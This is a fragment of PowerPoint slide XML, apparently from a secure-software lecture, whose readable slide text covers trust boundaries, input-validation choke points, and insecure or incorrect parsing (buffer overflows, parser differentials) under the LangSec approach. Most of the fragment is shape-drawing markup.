              <a:ext cx="428625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5357813" y="1571625"/>
              <a:ext cx="2000250" cy="500063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 input</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="16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3050" y="2747729"/>
              <a:ext cx="1627240" cy="951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choke point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for</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006600"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRP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rgbClr val="339933"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>input check</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="20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8252" name="Freeform 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5764213" y="2146300"/>
              <a:ext cx="523875" cy="3068638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 523461"/>
                <a:gd name="T1" fmla="*/ 0 h 2637183"/>
                <a:gd name="T2" fmla="*/ 134738 w 523461"/>
                <a:gd name="T3" fmla="*/ 10401317 h 2637183"/>
                <a:gd name="T4" fmla="*/ 444642 w 523461"/>
                <a:gd name="T5" fmla="*/ 18202322 h 2637183"/>
                <a:gd name="T6" fmla="*/ 485065 w 523461"/>
                <a:gd name="T7" fmla="*/ 33061328 h 2637183"/>
                <a:gd name="T8" fmla="*/ 161688 w 523461"/>
                <a:gd name="T9" fmla="*/ 54235394 h 2637183"/>
                <a:gd name="T10" fmla="*/ 390747 w 523461"/>
                <a:gd name="T11" fmla="*/ 73923670 h 2637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3461"/>
                <a:gd name="T19" fmla="*/ 0 h 2637183"/>
                <a:gd name="T20" fmla="*/ 523461 w 523461"/>
                <a:gd name="T21" fmla="*/ 2637183 h 2637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3461" h="2637183">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29817" y="131417"/>
                    <a:pt x="59634" y="262835"/>
                    <a:pt x="132521" y="371061"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205408" y="479287"/>
                    <a:pt x="379895" y="514627"/>
                    <a:pt x="437321" y="649357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="494747" y="784087"/>
                    <a:pt x="523461" y="965200"/>
                    <a:pt x="477078" y="1179444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="430695" y="1393688"/>
                    <a:pt x="174487" y="1691862"/>
                    <a:pt x="159026" y="1934818"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143565" y="2177774"/>
                    <a:pt x="263939" y="2407478"/>
                    <a:pt x="384313" y="2637183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53" name="Rectangle 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2195513" y="3357563"/>
              <a:ext cx="500062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54" name="Rectangle 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1116013" y="4437063"/>
              <a:ext cx="500062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55" name="Rectangle 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2916238" y="2420938"/>
              <a:ext cx="500062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56" name="Freeform 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1474788" y="2106613"/>
              <a:ext cx="657225" cy="3035300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 422870 w 655983"/>
                <a:gd name="T1" fmla="*/ 0 h 3034747"/>
                <a:gd name="T2" fmla="*/ 643496 w 655983"/>
                <a:gd name="T3" fmla="*/ 478905 h 3034747"/>
                <a:gd name="T4" fmla="*/ 188452 w 655983"/>
                <a:gd name="T5" fmla="*/ 1064248 h 3034747"/>
                <a:gd name="T6" fmla="*/ 78139 w 655983"/>
                <a:gd name="T7" fmla="*/ 1862424 h 3034747"/>
                <a:gd name="T8" fmla="*/ 657285 w 655983"/>
                <a:gd name="T9" fmla="*/ 2274814 h 3034747"/>
                <a:gd name="T10" fmla="*/ 216031 w 655983"/>
                <a:gd name="T11" fmla="*/ 3046387 h 30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983"/>
                <a:gd name="T19" fmla="*/ 0 h 3034747"/>
                <a:gd name="T20" fmla="*/ 655983 w 655983"/>
                <a:gd name="T21" fmla="*/ 3034747 h 30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983" h="3034747">
                  <a:moveTo>
                    <a:pt x="406401" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="531192" y="150191"/>
                    <a:pt x="655983" y="300382"/>
                    <a:pt x="618435" y="477078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580887" y="653774"/>
                    <a:pt x="271671" y="830470"/>
                    <a:pt x="181114" y="1060174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90558" y="1289878"/>
                    <a:pt x="0" y="1654313"/>
                    <a:pt x="75096" y="1855304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150192" y="2056295"/>
                    <a:pt x="609601" y="2069547"/>
                    <a:pt x="631688" y="2266121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653775" y="2462695"/>
                    <a:pt x="430696" y="2748721"/>
                    <a:pt x="207618" y="3034747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57" name="Freeform 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2428875" y="2071688"/>
              <a:ext cx="357188" cy="3035300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 655983"/>
                <a:gd name="T1" fmla="*/ 0 h 3034747"/>
                <a:gd name="T2" fmla="*/ 1 w 655983"/>
                <a:gd name="T3" fmla="*/ 478905 h 3034747"/>
                <a:gd name="T4" fmla="*/ 1 w 655983"/>
                <a:gd name="T5" fmla="*/ 1064248 h 3034747"/>
                <a:gd name="T6" fmla="*/ 1 w 655983"/>
                <a:gd name="T7" fmla="*/ 1862424 h 3034747"/>
                <a:gd name="T8" fmla="*/ 1 w 655983"/>
                <a:gd name="T9" fmla="*/ 2274814 h 3034747"/>
                <a:gd name="T10" fmla="*/ 1 w 655983"/>
                <a:gd name="T11" fmla="*/ 3046387 h 30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983"/>
                <a:gd name="T19" fmla="*/ 0 h 3034747"/>
                <a:gd name="T20" fmla="*/ 655983 w 655983"/>
                <a:gd name="T21" fmla="*/ 3034747 h 30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983" h="3034747">
                  <a:moveTo>
                    <a:pt x="406401" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="531192" y="150191"/>
                    <a:pt x="655983" y="300382"/>
                    <a:pt x="618435" y="477078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580887" y="653774"/>
                    <a:pt x="271671" y="830470"/>
                    <a:pt x="181114" y="1060174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90558" y="1289878"/>
                    <a:pt x="0" y="1654313"/>
                    <a:pt x="75096" y="1855304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150192" y="2056295"/>
                    <a:pt x="609601" y="2069547"/>
                    <a:pt x="631688" y="2266121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653775" y="2462695"/>
                    <a:pt x="430696" y="2748721"/>
                    <a:pt x="207618" y="3034747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6161" y="4436996"/>
              <a:ext cx="1458989" cy="378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data flows</a:t>
              </a:r>
              <a:endPara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61443" y="2715406"/>
              <a:ext cx="1757084" cy="1237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rgbClr val="006600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rgbClr val="339933"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>input checks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all over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the place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8260" name="Freeform 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6072188" y="2214563"/>
              <a:ext cx="655637" cy="3035300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 401924 w 655983"/>
                <a:gd name="T1" fmla="*/ 0 h 3034747"/>
                <a:gd name="T2" fmla="*/ 611622 w 655983"/>
                <a:gd name="T3" fmla="*/ 478905 h 3034747"/>
                <a:gd name="T4" fmla="*/ 179118 w 655983"/>
                <a:gd name="T5" fmla="*/ 1064248 h 3034747"/>
                <a:gd name="T6" fmla="*/ 74271 w 655983"/>
                <a:gd name="T7" fmla="*/ 1862424 h 3034747"/>
                <a:gd name="T8" fmla="*/ 624728 w 655983"/>
                <a:gd name="T9" fmla="*/ 2274814 h 3034747"/>
                <a:gd name="T10" fmla="*/ 205331 w 655983"/>
                <a:gd name="T11" fmla="*/ 3046387 h 30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983"/>
                <a:gd name="T19" fmla="*/ 0 h 3034747"/>
                <a:gd name="T20" fmla="*/ 655983 w 655983"/>
                <a:gd name="T21" fmla="*/ 3034747 h 30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983" h="3034747">
                  <a:moveTo>
                    <a:pt x="406401" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="531192" y="150191"/>
                    <a:pt x="655983" y="300382"/>
                    <a:pt x="618435" y="477078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580887" y="653774"/>
                    <a:pt x="271671" y="830470"/>
                    <a:pt x="181114" y="1060174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90558" y="1289878"/>
                    <a:pt x="0" y="1654313"/>
                    <a:pt x="75096" y="1855304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150192" y="2056295"/>
                    <a:pt x="609601" y="2069547"/>
                    <a:pt x="631688" y="2266121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653775" y="2462695"/>
                    <a:pt x="430696" y="2748721"/>
                    <a:pt x="207618" y="3034747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61" name="Freeform 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1214438" y="2071688"/>
              <a:ext cx="2178050" cy="3017837"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3320298 w 2122556"/>
                <a:gd name="T1" fmla="*/ 0 h 2849217"/>
                <a:gd name="T2" fmla="*/ 3180006 w 2122556"/>
                <a:gd name="T3" fmla="*/ 2488464 h 2849217"/>
                <a:gd name="T4" fmla="*/ 1753685 w 2122556"/>
                <a:gd name="T5" fmla="*/ 3286652 h 2849217"/>
                <a:gd name="T6" fmla="*/ 818383 w 2122556"/>
                <a:gd name="T7" fmla="*/ 2018945 h 2849217"/>
                <a:gd name="T8" fmla="*/ 280588 w 2122556"/>
                <a:gd name="T9" fmla="*/ 4084843 h 2849217"/>
                <a:gd name="T10" fmla="*/ 350735 w 2122556"/>
                <a:gd name="T11" fmla="*/ 6385488 h 2849217"/>
                <a:gd name="T12" fmla="*/ 1356184 w 2122556"/>
                <a:gd name="T13" fmla="*/ 6291582 h 2849217"/>
                <a:gd name="T14" fmla="*/ 3016331 w 2122556"/>
                <a:gd name="T15" fmla="*/ 5915965 h 2849217"/>
                <a:gd name="T16" fmla="*/ 3671035 w 2122556"/>
                <a:gd name="T17" fmla="*/ 6855011 h 2849217"/>
                <a:gd name="T18" fmla="*/ 2572067 w 2122556"/>
                <a:gd name="T19" fmla="*/ 7981856 h 2849217"/>
                <a:gd name="T20" fmla="*/ 1823828 w 2122556"/>
                <a:gd name="T21" fmla="*/ 9108714 h 2849217"/>
                <a:gd name="T22" fmla="*/ 748236 w 2122556"/>
                <a:gd name="T23" fmla="*/ 9719080 h 2849217"/>
                <a:gd name="T24" fmla="*/ 280588 w 2122556"/>
                <a:gd name="T25" fmla="*/ 9531268 h 2849217"/>
                <a:gd name="T26" fmla="*/ 46766 w 2122556"/>
                <a:gd name="T27" fmla="*/ 7559285 h 2849217"/>
                <a:gd name="T28" fmla="*/ 561178 w 2122556"/>
                <a:gd name="T29" fmla="*/ 6948917 h 2849217"/>
                <a:gd name="T30" fmla="*/ 1519854 w 2122556"/>
                <a:gd name="T31" fmla="*/ 6948917 h 2849217"/>
                <a:gd name="T32" fmla="*/ 2034271 w 2122556"/>
                <a:gd name="T33" fmla="*/ 8216620 h 2849217"/>
                <a:gd name="T34" fmla="*/ 3016331 w 2122556"/>
                <a:gd name="T35" fmla="*/ 10094690 h 2849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2556"/>
                <a:gd name="T55" fmla="*/ 0 h 2849217"/>
                <a:gd name="T56" fmla="*/ 2122556 w 2122556"/>
                <a:gd name="T57" fmla="*/ 2849217 h 2849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2556" h="2849217">
                  <a:moveTo>
                    <a:pt x="1881808" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1916042" y="273878"/>
                    <a:pt x="1950277" y="547756"/>
                    <a:pt x="1802295" y="702365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1654313" y="856974"/>
                    <a:pt x="1216991" y="949739"/>
                    <a:pt x="993913" y="927652"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="770835" y="905565"/>
                    <a:pt x="602974" y="532295"/>
                    <a:pt x="463826" y="569843"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324678" y="607391"/>
                    <a:pt x="203200" y="947530"/>
                    <a:pt x="159026" y="1152939"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114852" y="1358348"/>
                    <a:pt x="97182" y="1698487"/>
                    <a:pt x="198782" y="1802296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300382" y="1906105"/>
                    <a:pt x="516835" y="1797878"/>
                    <a:pt x="768626" y="1775791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1020417" y="1753704"/>
                    <a:pt x="1490869" y="1643270"/>
                    <a:pt x="1709530" y="1669774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1928191" y="1696278"/>
                    <a:pt x="2122556" y="1837634"/>
                    <a:pt x="2080591" y="1934817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2038626" y="2032000"/>
                    <a:pt x="1632226" y="2146853"/>
                    <a:pt x="1457739" y="2252870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1283252" y="2358887"/>
                    <a:pt x="1205947" y="2489200"/>
                    <a:pt x="1033669" y="2570922"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="861391" y="2652644"/>
                    <a:pt x="569843" y="2723322"/>
                    <a:pt x="424069" y="2743200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278295" y="2763078"/>
                    <a:pt x="225287" y="2791791"/>
                    <a:pt x="159026" y="2690191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92765" y="2588591"/>
                    <a:pt x="0" y="2255078"/>
                    <a:pt x="26504" y="2133600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53008" y="2012122"/>
                    <a:pt x="178904" y="1990035"/>
                    <a:pt x="318052" y="1961322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457200" y="1932609"/>
                    <a:pt x="722243" y="1901687"/>
                    <a:pt x="861391" y="1961322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1000539" y="2020957"/>
                    <a:pt x="1011583" y="2171148"/>
                    <a:pt x="1152939" y="2319130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1294295" y="2467112"/>
                    <a:pt x="1557130" y="2729947"/>
                    <a:pt x="1709530" y="2849217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8262" name="TextBox 39"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="714375" y="2428875"/>
              <a:ext cx="457176" cy="249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r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o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g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r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</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="nl-NL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8263" name="Freeform 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5287963" y="2200275"/>
              <a:ext cx="1941512" cy="2968625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1941444"/>
                <a:gd name="T1" fmla="*/ 0 h 2968487"/>
                <a:gd name="T2" fmla="*/ 318284 w 1941444"/>
                <a:gd name="T3" fmla="*/ 331627 h 2968487"/>
                <a:gd name="T4" fmla="*/ 517213 w 1941444"/>
                <a:gd name="T5" fmla="*/ 464288 h 2968487"/>
                <a:gd name="T6" fmla="*/ 915072 w 1941444"/>
                <a:gd name="T7" fmla="*/ 225505 h 2968487"/>
                <a:gd name="T8" fmla="*/ 1127262 w 1941444"/>
                <a:gd name="T9" fmla="*/ 477540 h 2968487"/>
                <a:gd name="T10" fmla="*/ 1511861 w 1941444"/>
                <a:gd name="T11" fmla="*/ 172446 h 2968487"/>
                <a:gd name="T12" fmla="*/ 1790367 w 1941444"/>
                <a:gd name="T13" fmla="*/ 185719 h 2968487"/>
                <a:gd name="T14" fmla="*/ 1710791 w 1941444"/>
                <a:gd name="T15" fmla="*/ 358166 h 2968487"/>
                <a:gd name="T16" fmla="*/ 1432285 w 1941444"/>
                <a:gd name="T17" fmla="*/ 570410 h 2968487"/>
                <a:gd name="T18" fmla="*/ 1140527 w 1941444"/>
                <a:gd name="T19" fmla="*/ 716318 h 2968487"/>
                <a:gd name="T20" fmla="*/ 1087477 w 1941444"/>
                <a:gd name="T21" fmla="*/ 941828 h 2968487"/>
                <a:gd name="T22" fmla="*/ 1153788 w 1941444"/>
                <a:gd name="T23" fmla="*/ 1207133 h 2968487"/>
                <a:gd name="T24" fmla="*/ 1405760 w 1941444"/>
                <a:gd name="T25" fmla="*/ 1392844 h 2968487"/>
                <a:gd name="T26" fmla="*/ 1684265 w 1941444"/>
                <a:gd name="T27" fmla="*/ 1631614 h 2968487"/>
                <a:gd name="T28" fmla="*/ 1936246 w 1941444"/>
                <a:gd name="T29" fmla="*/ 1910183 h 2968487"/>
                <a:gd name="T30" fmla="*/ 1724043 w 1941444"/>
                <a:gd name="T31" fmla="*/ 2268335 h 2968487"/>
                <a:gd name="T32" fmla="*/ 1339457 w 1941444"/>
                <a:gd name="T33" fmla="*/ 1910183 h 2968487"/>
                <a:gd name="T34" fmla="*/ 1034426 w 1941444"/>
                <a:gd name="T35" fmla="*/ 1724471 h 2968487"/>
                <a:gd name="T36" fmla="*/ 503961 w 1941444"/>
                <a:gd name="T37" fmla="*/ 1910183 h 2968487"/>
                <a:gd name="T38" fmla="*/ 238708 w 1941444"/>
                <a:gd name="T39" fmla="*/ 2268335 h 2968487"/>
                <a:gd name="T40" fmla="*/ 159152 w 1941444"/>
                <a:gd name="T41" fmla="*/ 2599975 h 2968487"/>
                <a:gd name="T42" fmla="*/ 79576 w 1941444"/>
                <a:gd name="T43" fmla="*/ 2971385 h 296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1444"/>
                <a:gd name="T67" fmla="*/ 0 h 2968487"/>
                <a:gd name="T68" fmla="*/ 1941444 w 1941444"/>
                <a:gd name="T69" fmla="*/ 2968487 h 296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1444" h="2968487">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115957" y="127000"/>
                    <a:pt x="231914" y="254000"/>
                    <a:pt x="318053" y="331304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="404192" y="408608"/>
                    <a:pt x="417444" y="481496"/>
                    <a:pt x="516835" y="463826"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="616226" y="446157"/>
                    <a:pt x="812800" y="223078"/>
                    <a:pt x="914400" y="225287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016000" y="227496"/>
                    <a:pt x="1027044" y="485913"/>
                    <a:pt x="1126435" y="477078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1225826" y="468243"/>
                    <a:pt x="1400313" y="220869"/>
                    <a:pt x="1510748" y="172278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1621183" y="123687"/>
                    <a:pt x="1755914" y="154608"/>
                    <a:pt x="1789044" y="185530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1822174" y="216452"/>
                    <a:pt x="1769166" y="293757"/>
                    <a:pt x="1709531" y="357809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1649896" y="421861"/>
                    <a:pt x="1526209" y="510208"/>
                    <a:pt x="1431235" y="569843"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1336261" y="629478"/>
                    <a:pt x="1197113" y="653774"/>
                    <a:pt x="1139687" y="715617"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1082261" y="777460"/>
                    <a:pt x="1084470" y="859182"/>
                    <a:pt x="1086679" y="940904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1088888" y="1022626"/>
                    <a:pt x="1099931" y="1130852"/>
                    <a:pt x="1152940" y="1205948"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1205949" y="1281044"/>
                    <a:pt x="1316383" y="1320800"/>
                    <a:pt x="1404731" y="1391478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1493079" y="1462156"/>
                    <a:pt x="1594678" y="1543878"/>
                    <a:pt x="1683026" y="1630017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1771374" y="1716156"/>
                    <a:pt x="1928192" y="1802296"/>
                    <a:pt x="1934818" y="1908313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1941444" y="2014331"/>
                    <a:pt x="1822174" y="2266122"/>
                    <a:pt x="1722783" y="2266122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1623392" y="2266122"/>
                    <a:pt x="1453322" y="1998870"/>
                    <a:pt x="1338470" y="1908313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1223618" y="1817756"/>
                    <a:pt x="1172818" y="1722782"/>
                    <a:pt x="1033670" y="1722782"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="894522" y="1722782"/>
                    <a:pt x="636105" y="1817756"/>
                    <a:pt x="503583" y="1908313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371061" y="1998870"/>
                    <a:pt x="295966" y="2151270"/>
                    <a:pt x="238540" y="2266122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181114" y="2380974"/>
                    <a:pt x="185530" y="2480365"/>
                    <a:pt x="159026" y="2597426"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132522" y="2714487"/>
                    <a:pt x="106017" y="2841487"/>
                    <a:pt x="79513" y="2968487"/>
                  </a:cubicBez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132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94" y="2492896"/>
            <a:ext cx="3609648" cy="292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Trust boundaries &amp; choke points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Identifying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust boundaries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>useful to decide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>  to have choke points  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>, on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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 </a:t>
            </a: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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="1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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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804469" y="2924944"/>
            <a:ext cx="3978856" cy="15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8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C0765-7C05-D2F6-1CD0-865CFC6BC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 II.  Tackling insecure &amp; incorrect parsing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-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using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LangSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> approach</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF000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1EE0E9-D1C5-AF9A-9F1F-A9BED74F7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08AC-EB66-EADF-9D8D-144D2CF4367C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252218E-0481-4205-9DD0-7FB663384F66}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>53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96782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FCC5-3907-EBED-2E30-2E92563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Buggy parsing (1 &amp; 2)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FC20-57F4-D13B-9F03-3026C436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Here by buggy parsing we mean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insecure parsing  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="414726" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Eg.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> buffer overflow in Office, PDF viewer, network stack, graphics library, ..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incorrect parsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resulting in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parser differentials,                                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>i.e. two libraries parsing the same URL in different ways </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="362885" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
